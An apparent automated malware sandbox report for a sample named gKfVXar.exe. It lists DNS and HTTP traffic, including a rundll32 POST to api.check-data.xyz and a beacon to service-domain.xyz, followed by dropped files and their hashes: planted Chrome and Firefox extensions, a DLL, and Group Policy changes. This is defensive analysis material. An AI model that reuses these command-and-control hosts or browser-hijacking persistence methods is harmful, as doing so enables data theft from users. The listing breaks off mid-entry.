                                                        Vary: Accept-Encoding
                                                      • flag-us
                                                        DNS
                                                        o.pki.goog
                                                        gKfVXar.exe
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        o.pki.goog
                                                        IN A
                                                        Response
                                                        o.pki.goog
                                                        IN CNAME
                                                        pki-goog.l.google.com
                                                        pki-goog.l.google.com
                                                        IN A
                                                        142.250.187.227
                                                      • flag-gb
                                                        GET
                                                        http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQC7uIYpw4nJmAnwguIyZivr
                                                        gKfVXar.exe
                                                        Remote address:
                                                        142.250.187.227:80
                                                        Request
                                                        GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQC7uIYpw4nJmAnwguIyZivr HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        User-Agent: Microsoft-CryptoAPI/10.0
                                                        Host: o.pki.goog
                                                        Response
                                                        HTTP/1.1 200 OK
                                                        Server: ocsp_responder
                                                        Content-Length: 472
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        Date: Mon, 11 Nov 2024 21:42:46 GMT
                                                        Cache-Control: public, max-age=14400
                                                        Content-Type: application/ocsp-response
                                                        Age: 40
                                                      • flag-gb
                                                        GET
                                                        http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDzySkSNBgXtBKLijHUmMxR
                                                        gKfVXar.exe
                                                        Remote address:
                                                        142.250.187.227:80
                                                        Request
                                                        GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDzySkSNBgXtBKLijHUmMxR HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        User-Agent: Microsoft-CryptoAPI/10.0
                                                        Host: o.pki.goog
                                                        Response
                                                        HTTP/1.1 200 OK
                                                        Server: ocsp_responder
                                                        Content-Length: 472
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        Date: Mon, 11 Nov 2024 21:07:59 GMT
                                                        Cache-Control: public, max-age=14400
                                                        Content-Type: application/ocsp-response
                                                        Age: 2128
                                                      • flag-us
                                                        DNS
                                                        10.178.250.142.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        10.178.250.142.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                        10.178.250.142.in-addr.arpa
                                                        IN PTR
                                                        lhr48s27-in-f101e100net
                                                      • flag-us
                                                        DNS
                                                        227.187.250.142.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        227.187.250.142.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                        227.187.250.142.in-addr.arpa
                                                        IN PTR
                                                        lhr25s34-in-f31e100net
                                                      • flag-us
                                                        DNS
                                                        clients2.google.com
                                                        gKfVXar.exe
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        clients2.google.com
                                                        IN A
                                                        Response
                                                        clients2.google.com
                                                        IN CNAME
                                                        clients.l.google.com
                                                        clients.l.google.com
                                                        IN A
                                                        142.250.178.14
                                                      • flag-gb
                                                        GET
                                                        https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Dmeejmcfbiapijdfaadackoblffmidlig%26installsource%3Dondemand%26uc&ZiAchwrWJz
                                                        gKfVXar.exe
                                                        Remote address:
                                                        142.250.178.14:443
                                                        Request
                                                        GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Dmeejmcfbiapijdfaadackoblffmidlig%26installsource%3Dondemand%26uc&ZiAchwrWJz HTTP/1.1
                                                        Host: clients2.google.com
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        Response
                                                        HTTP/1.1 204 No Content
                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-b1w8m81ZYKh_f2lRGCDOGQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 11 Nov 2024 21:43:27 GMT
                                                        Server: GSE
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      • flag-us
                                                        DNS
                                                        14.178.250.142.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        14.178.250.142.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                        14.178.250.142.in-addr.arpa
                                                        IN PTR
                                                        lhr48s27-in-f141e100net
                                                      • flag-us
                                                        DNS
                                                        api.check-data.xyz
                                                        rundll32.exe
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        api.check-data.xyz
                                                        IN A
                                                        Response
                                                        api.check-data.xyz
                                                        IN CNAME
                                                        checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                        checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                        IN A
                                                        35.162.118.53
                                                        checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                        IN A
                                                        44.226.34.177
                                                      • flag-us
                                                        POST
                                                        http://api.check-data.xyz/api2/google_api_ifi
                                                        rundll32.exe
                                                        Remote address:
                                                        35.162.118.53:80
                                                        Request
                                                        POST /api2/google_api_ifi HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
                                                        Host: api.check-data.xyz
                                                        Content-Length: 724
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        Response
                                                        HTTP/1.1 200 OK
                                                        Access-Control-Allow-Origin: *
                                                        Cache-control: no-cache="set-cookie"
                                                        Content-Type: text/html; charset=UTF-8
                                                        Date: Mon, 11 Nov 2024 21:43:26 GMT
                                                        Server: nginx
                                                        Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9824CDF98F06272B58281A369C0E7C7AE6EC5781D948882C8767BA08E2574E7340BD1AEA80ADD88F1586867317B7C62D227;PATH=/;MAX-AGE=43200
                                                        Content-Length: 0
                                                        Connection: keep-alive
                                                      • flag-us
                                                        DNS
                                                        53.118.162.35.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        53.118.162.35.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                        53.118.162.35.in-addr.arpa
                                                        IN PTR
                                                        ec2-35-162-118-53 us-west-2compute amazonawscom
                                                      • flag-us
                                                        DNS
                                                        211.143.182.52.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        211.143.182.52.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                      • 54.210.117.250:443
                                                        https://service-domain.xyz/google_ifi_ico.png?rnd=Ye3Ylk0NL0Ikf4jkg1IJ_GJSB9TJSB5GISB7UJSB2RJSB9TJSB2JJSB9RJSB0GISB7AMSB3
                                                        tls, http
                                                        gKfVXar.exe
                                                        988 B
                                                        4.1kB
                                                        11
                                                        9

                                                        HTTP Request

                                                        GET https://service-domain.xyz/google_ifi_ico.png?rnd=Ye3Ylk0NL0Ikf4jkg1IJ_GJSB9TJSB5GISB7UJSB2RJSB9TJSB2JJSB9RJSB0GISB7AMSB3

                                                        HTTP Response

                                                        200
                                                      • 2.23.210.82:80
                                                        http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgQ4DAJlzABIp9rEE8P1Q1t%2FYw%3D%3D
                                                        http
                                                        gKfVXar.exe
                                                        472 B
                                                        1.0kB
                                                        5
                                                        3

                                                        HTTP Request

                                                        GET http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgQ4DAJlzABIp9rEE8P1Q1t%2FYw%3D%3D

                                                        HTTP Response

                                                        200
                                                      • 151.101.129.91:80
                                                        http://addons.mozilla.org/firefox/downloads/latest/find-it-pro?RnUfkyueus
                                                        http
                                                        gKfVXar.exe
                                                        416 B
                                                        545 B
                                                        6
                                                        5

                                                        HTTP Request

                                                        GET http://addons.mozilla.org/firefox/downloads/latest/find-it-pro?RnUfkyueus

                                                        HTTP Response

                                                        301
                                                      • 151.101.129.91:443
                                                        https://addons.mozilla.org/firefox/downloads/latest/find-it-pro/?XpnNrrxQfG
                                                        tls, http
                                                        gKfVXar.exe
                                                        2.8kB
                                                        39.0kB
                                                        41
                                                        39

                                                        HTTP Request

                                                        GET https://addons.mozilla.org/firefox/downloads/latest/find-it-pro?RnUfkyueus

                                                        HTTP Response

                                                        301

                                                        HTTP Request

                                                        GET https://addons.mozilla.org/firefox/downloads/latest/find-it-pro/?RnUfkyueus

                                                        HTTP Response

                                                        404

                                                        HTTP Request

                                                        GET https://addons.mozilla.org/firefox/downloads/latest/find-it-pro?XpnNrrxQfG

                                                        HTTP Response

                                                        301

                                                        HTTP Request

                                                        GET https://addons.mozilla.org/firefox/downloads/latest/find-it-pro/?XpnNrrxQfG

                                                        HTTP Response

                                                        404
                                                      • 151.101.129.91:80
                                                        http://addons.mozilla.org/firefox/downloads/latest/find-it-pro?XpnNrrxQfG
                                                        http
                                                        gKfVXar.exe
                                                        416 B
                                                        545 B
                                                        6
                                                        5

                                                        HTTP Request

                                                        GET http://addons.mozilla.org/firefox/downloads/latest/find-it-pro?XpnNrrxQfG

                                                        HTTP Response

                                                        301
                                                      • 142.250.187.227:80
                                                        http://c.pki.goog/r/r1.crl
                                                        http
                                                        gKfVXar.exe
                                                        349 B
                                                        1.7kB
                                                        5
                                                        4

                                                        HTTP Request

                                                        GET http://c.pki.goog/r/r1.crl

                                                        HTTP Response

                                                        200
                                                      • 142.250.187.227:80
                                                        http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDzySkSNBgXtBKLijHUmMxR
                                                        http
                                                        gKfVXar.exe
                                                        782 B
                                                        1.6kB
                                                        7
                                                        4

                                                        HTTP Request

                                                        GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQC7uIYpw4nJmAnwguIyZivr

                                                        HTTP Response

                                                        200

                                                        HTTP Request

                                                        GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDzySkSNBgXtBKLijHUmMxR

                                                        HTTP Response

                                                        200
                                                      • 142.250.178.14:443
                                                        https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Dmeejmcfbiapijdfaadackoblffmidlig%26installsource%3Dondemand%26uc&ZiAchwrWJz
                                                        tls, http
                                                        gKfVXar.exe
                                                        1.2kB
                                                        7.7kB
                                                        13
                                                        10

                                                        HTTP Request

                                                        GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Dmeejmcfbiapijdfaadackoblffmidlig%26installsource%3Dondemand%26uc&ZiAchwrWJz

                                                        HTTP Response

                                                        204
                                                      • 35.162.118.53:80
                                                        http://api.check-data.xyz/api2/google_api_ifi
                                                        http
                                                        rundll32.exe
                                                        1.2kB
                                                        536 B
                                                        5
                                                        3

                                                        HTTP Request

                                                        POST http://api.check-data.xyz/api2/google_api_ifi

                                                        HTTP Response

                                                        200
                                                      • 8.8.8.8:53
                                                        232.168.11.51.in-addr.arpa
                                                        dns
                                                        72 B
                                                        158 B
                                                        1
                                                        1

                                                        DNS Request

                                                        232.168.11.51.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        69.209.201.84.in-addr.arpa
                                                        dns
                                                        72 B
                                                        132 B
                                                        1
                                                        1

                                                        DNS Request

                                                        69.209.201.84.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        95.221.229.192.in-addr.arpa
                                                        dns
                                                        73 B
                                                        144 B
                                                        1
                                                        1

                                                        DNS Request

                                                        95.221.229.192.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        17.160.190.20.in-addr.arpa
                                                        dns
                                                        72 B
                                                        158 B
                                                        1
                                                        1

                                                        DNS Request

                                                        17.160.190.20.in-addr.arpa

                                                      • 224.0.0.251:5353
                                                        316 B
                                                        4
                                                      • 8.8.8.8:53
                                                        50.23.12.20.in-addr.arpa
                                                        dns
                                                        70 B
                                                        156 B
                                                        1
                                                        1

                                                        DNS Request

                                                        50.23.12.20.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        198.187.3.20.in-addr.arpa
                                                        dns
                                                        71 B
                                                        157 B
                                                        1
                                                        1

                                                        DNS Request

                                                        198.187.3.20.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        27.117.19.2.in-addr.arpa
                                                        dns
                                                        70 B
                                                        133 B
                                                        1
                                                        1

                                                        DNS Request

                                                        27.117.19.2.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        83.210.23.2.in-addr.arpa
                                                        dns
                                                        70 B
                                                        133 B
                                                        1
                                                        1

                                                        DNS Request

                                                        83.210.23.2.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        22.236.111.52.in-addr.arpa
                                                        dns
                                                        72 B
                                                        158 B
                                                        1
                                                        1

                                                        DNS Request

                                                        22.236.111.52.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        103.209.201.84.in-addr.arpa
                                                        dns
                                                        73 B
                                                        133 B
                                                        1
                                                        1

                                                        DNS Request

                                                        103.209.201.84.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        service-domain.xyz
                                                        dns
                                                        gKfVXar.exe
                                                        64 B
                                                        80 B
                                                        1
                                                        1

                                                        DNS Request

                                                        service-domain.xyz

                                                        DNS Response

                                                        54.210.117.250

                                                      • 8.8.8.8:53
                                                        r10.o.lencr.org
                                                        dns
                                                        gKfVXar.exe
                                                        61 B
                                                        160 B
                                                        1
                                                        1

                                                        DNS Request

                                                        r10.o.lencr.org

                                                        DNS Response

                                                        2.23.210.82
                                                        2.23.210.75

                                                      • 8.8.8.8:53
                                                        250.117.210.54.in-addr.arpa
                                                        dns
                                                        73 B
                                                        129 B
                                                        1
                                                        1

                                                        DNS Request

                                                        250.117.210.54.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        69.194.219.23.in-addr.arpa
                                                        dns
                                                        72 B
                                                        137 B
                                                        1
                                                        1

                                                        DNS Request

                                                        69.194.219.23.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        82.210.23.2.in-addr.arpa
                                                        dns
                                                        70 B
                                                        133 B
                                                        1
                                                        1

                                                        DNS Request

                                                        82.210.23.2.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        addons.mozilla.org
                                                        dns
                                                        gKfVXar.exe
                                                        64 B
                                                        128 B
                                                        1
                                                        1

                                                        DNS Request

                                                        addons.mozilla.org

                                                        DNS Response

                                                        151.101.129.91
                                                        151.101.65.91
                                                        151.101.1.91
                                                        151.101.193.91

                                                      • 8.8.8.8:53
                                                        91.129.101.151.in-addr.arpa
                                                        dns
                                                        73 B
                                                        133 B
                                                        1
                                                        1

                                                        DNS Request

                                                        91.129.101.151.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        c.pki.goog
                                                        dns
                                                        gKfVXar.exe
                                                        56 B
                                                        107 B
                                                        1
                                                        1

                                                        DNS Request

                                                        c.pki.goog

                                                        DNS Response

                                                        142.250.187.227

                                                      • 8.8.8.8:53
                                                        o.pki.goog
                                                        dns
                                                        gKfVXar.exe
                                                        56 B
                                                        107 B
                                                        1
                                                        1

                                                        DNS Request

                                                        o.pki.goog

                                                        DNS Response

                                                        142.250.187.227

                                                      • 8.8.8.8:53
                                                        10.178.250.142.in-addr.arpa
                                                        dns
                                                        73 B
                                                        112 B
                                                        1
                                                        1

                                                        DNS Request

                                                        10.178.250.142.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        227.187.250.142.in-addr.arpa
                                                        dns
                                                        74 B
                                                        112 B
                                                        1
                                                        1

                                                        DNS Request

                                                        227.187.250.142.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        clients2.google.com
                                                        dns
                                                        gKfVXar.exe
                                                        65 B
                                                        105 B
                                                        1
                                                        1

                                                        DNS Request

                                                        clients2.google.com

                                                        DNS Response

                                                        142.250.178.14

                                                      • 8.8.8.8:53
                                                        14.178.250.142.in-addr.arpa
                                                        dns
                                                        73 B
                                                        112 B
                                                        1
                                                        1

                                                        DNS Request

                                                        14.178.250.142.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        api.check-data.xyz
                                                        dns
                                                        rundll32.exe
                                                        64 B
                                                        158 B
                                                        1
                                                        1

                                                        DNS Request

                                                        api.check-data.xyz

                                                        DNS Response

                                                        35.162.118.53
                                                        44.226.34.177

                                                      • 8.8.8.8:53
                                                        53.118.162.35.in-addr.arpa
                                                        dns
                                                        72 B
                                                        135 B
                                                        1
                                                        1

                                                        DNS Request

                                                        53.118.162.35.in-addr.arpa

                                                      • 8.8.8.8:53
                                                        211.143.182.52.in-addr.arpa
                                                        dns
                                                        73 B
                                                        147 B
                                                        1
                                                        1

                                                        DNS Request

                                                        211.143.182.52.in-addr.arpa

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Program Files (x86)\UBqYudvSNocU2\cMEXQfR.xml

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        f44c9d40b45b8434a525f14090b39d6e

                                                        SHA1

                                                        d815f2f9aaa17e778a6c474c79f9792472c483c5

                                                        SHA256

                                                        07e7a9ba830cd078e75ae5c3a4022e76730284d0003bde70f4ec1afdc59010ef

                                                        SHA512

                                                        0d37a08ad5637967ba2e386e3188c01ca0b04b17112854dd9755186b57ae9911b3db4ac0c6f2d7d3903aaa438990f56812841c667e712cc81e96db50fde590fa

                                                      • C:\Program Files (x86)\ZUXSmeDRU\EiJiwro.xml

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        a80a6db18488850fa5d5279b80c8b304

                                                        SHA1

                                                        96885fe321daaacce2ff4a1759745356d671e4fe

                                                        SHA256

                                                        35777eeda552103a81cc85898b5c0a6199737ead8c61836c31e7c83940c25a81

                                                        SHA512

                                                        f7e0580d34c2ff0e8f784b5b724333beb56aa1836573057742f3b0b78f888640f345ea8283ab456878b53e50a7e71f72a5ff904eadd8e670813fbbe7e4ed3fff

                                                      • C:\Program Files (x86)\oXjeNNLqKAotC\nAJnCyw.xml

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        13a3307c18228d8101d149d84216f1e9

                                                        SHA1

                                                        7bd97ce8418921f6449b7a6c6a06682793a78435

                                                        SHA256

                                                        d2528b4f72251b8e0900d1f58faff2ae5865285255c3b421c6ea27bb851c2c4e

                                                        SHA512

                                                        1b7b8de2977ea695d5d02e22c1697711fb7e6ae06b69dbfd292c450bd4e1d78b47222eea78be2a07a3bef95dd176bf2f80388ca3c17750503bf4fe00972fbe8f

                                                      • C:\Program Files (x86)\xonCRuklPFipnPeqKpR\lYMkSqB.xml

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        39313f4bbf6889109c7eaf2b6e93ed6b

                                                        SHA1

                                                        71154e485db4f6f7c58ede10e13c21a951e18896

                                                        SHA256

                                                        2422ac71e33d491639b539e63a5f0919f6c1b3df4a01b74286488fab9f73a087

                                                        SHA512

                                                        f6e5efb79a716fad0544d590cd37d1b480263729e1521a944ada15fdc13bad8b1b567f532d3c3d409f368fcea77c91704a3fe46b86f7c7114a682ed2dace0fda

                                                      • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                        Filesize

                                                        1.1MB

                                                        MD5

                                                        0f9f7aa1f5117b46ddb69e21fe6f2825

                                                        SHA1

                                                        9d1c2467468b71ace23704af5529b6c70fc29f36

                                                        SHA256

                                                        628646645a289a5454d2bc96315ab3bc2ebb1b3574042f74decb0e0ca42ea057

                                                        SHA512

                                                        6ce6d6530070b1a7783551698b734e0c3429db290109a23253d51603ac9638d9dd2f45af7ecac83fd976f1af2e11d24b29cb83663c00de733df1c83955025eac

                                                      • C:\ProgramData\hrOORTLiECQfZJVB\jJxnkyn.xml

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        bc204f30a069b452cf3fc48f81f1ccf3

                                                        SHA1

                                                        0de9ceb247955a586266274ed2bbf867ad30fa98

                                                        SHA256

                                                        67925ecf7a7423bb099347620cd663e0bc53ac51dd4f372f606a8c95a3a2e7ff

                                                        SHA512

                                                        04cec319c3caec0e5307cbd7c30f9e00a87e93a82403a25e8b78ceb8455e8915b0ec229243a329e185402b2f522e89c187ac4a53c95af9d5b663208e86e42c14

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                        Filesize

                                                        187B

                                                        MD5

                                                        2a1e12a4811892d95962998e184399d8

                                                        SHA1

                                                        55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                        SHA256

                                                        32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                        SHA512

                                                        bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                        Filesize

                                                        136B

                                                        MD5

                                                        238d2612f510ea51d0d3eaa09e7136b1

                                                        SHA1

                                                        0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                        SHA256

                                                        801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                        SHA512

                                                        2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                        Filesize

                                                        150B

                                                        MD5

                                                        0b1cf3deab325f8987f2ee31c6afc8ea

                                                        SHA1

                                                        6a51537cef82143d3d768759b21598542d683904

                                                        SHA256

                                                        0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                        SHA512

                                                        5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        6cf293cb4d80be23433eecf74ddb5503

                                                        SHA1

                                                        24fe4752df102c2ef492954d6b046cb5512ad408

                                                        SHA256

                                                        b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                        SHA512

                                                        0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        64B

                                                        MD5

                                                        50a8221b93fbd2628ac460dd408a9fc1

                                                        SHA1

                                                        7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

                                                        SHA256

                                                        46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

                                                        SHA512

                                                        27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8397.tmp\Install.exe

                                                        Filesize

                                                        6.8MB

                                                        MD5

                                                        6cb87a9fc7dc1f2a5410fd428f5460f0

                                                        SHA1

                                                        2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

                                                        SHA256

                                                        fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

                                                        SHA512

                                                        4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qa5f3hcr.pk0.ps1

                                                        Filesize

                                                        60B

                                                        MD5

                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                        SHA1

                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                        SHA256

                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                        SHA512

                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\prefs.js

                                                        Filesize

                                                        12KB

                                                        MD5

                                                        fb6e0e8fee85431cb73000a47013190b

                                                        SHA1

                                                        7842d60697c838163424fd4b906a161dc034fddc

                                                        SHA256

                                                        ccc19ee255fcdeb04edfc45ae106fbf3fd1f98c5d1660968be2a7ca4262372d3

                                                        SHA512

                                                        83ee54c5164b05316c7a3ebed956b74b8b02ad97468ff42dbdd015d04986ebb4a913ab38d3636de00135482218f77ffb5105f45eda61901e3be5b0bcaa18dd9e

                                                      • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        33b19d75aa77114216dbc23f43b195e3

                                                        SHA1

                                                        36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                                                        SHA256

                                                        b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                                                        SHA512

                                                        676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                                                      • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        11KB

                                                        MD5

                                                        1e2c46d707095416e0688722396d9f42

                                                        SHA1

                                                        fc68f74ffb90254cda36c2a1ff559857bb4b8ad1

                                                        SHA256

                                                        1ce00911717ca1d7ac60b5ee7d8b32c5cfa98b4e6fd468e3ad9233d0057de3b7

                                                        SHA512

                                                        144425003ac98b6ce1189077c558589766b347ddb71cd3d994b7b28d7915ad08f72be48bb9b1b5e18e6a7cb41d8a45e7e26290a7e0a54aca0294bd7d358bfe9e

                                                      • C:\Windows\Temp\YSrBLfWUtIHnuviW\bCCdSLSI\gMMmVQX.dll

                                                        Filesize

                                                        6.2MB

                                                        MD5

                                                        8cfc8a5c654e986ab3de168ecbc93096

                                                        SHA1

                                                        a745e47565aed873f5f5264543479266d8918a64

                                                        SHA256

                                                        2996bcb9d033414f6dce67539a71bf29250dc19a66424944065bf5cdf285500a

                                                        SHA512

                                                        99398bbaed5f5547331f21c9e9b2eda5b4842ad88b950f1cce4a04202d45a25a83fdd1593f6b15d05fdee7ba4872ba287b4a5e5c1a0c8c337311eb8b3326dac3

                                                      • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                        Filesize

                                                        5KB

                                                        MD5

                                                        8a23e7417f0e171228321494ead8e634

                                                        SHA1

                                                        929d7a156f7bdff24875772e56f69d2b0715a59f

                                                        SHA256

                                                        fc2c39e0dc4a7e8e5f576cfef0253ef6adca13617ea7983b0f0a0ca2ddab8ef3

                                                        SHA512

                                                        248680d761e09aeac8580416201ccc06e21258f98a9db3187a29ff525896cc79cd91827f2b52a34718f204dabe95d2311314439f74c0cb3019f4b89ce92b0037

                                                      • C:\Windows\system32\GroupPolicy\gpt.ini

                                                        Filesize

                                                        268B

                                                        MD5

                                                        a62ce44a33f1c05fc2d340ea0ca118a4

                                                        SHA1

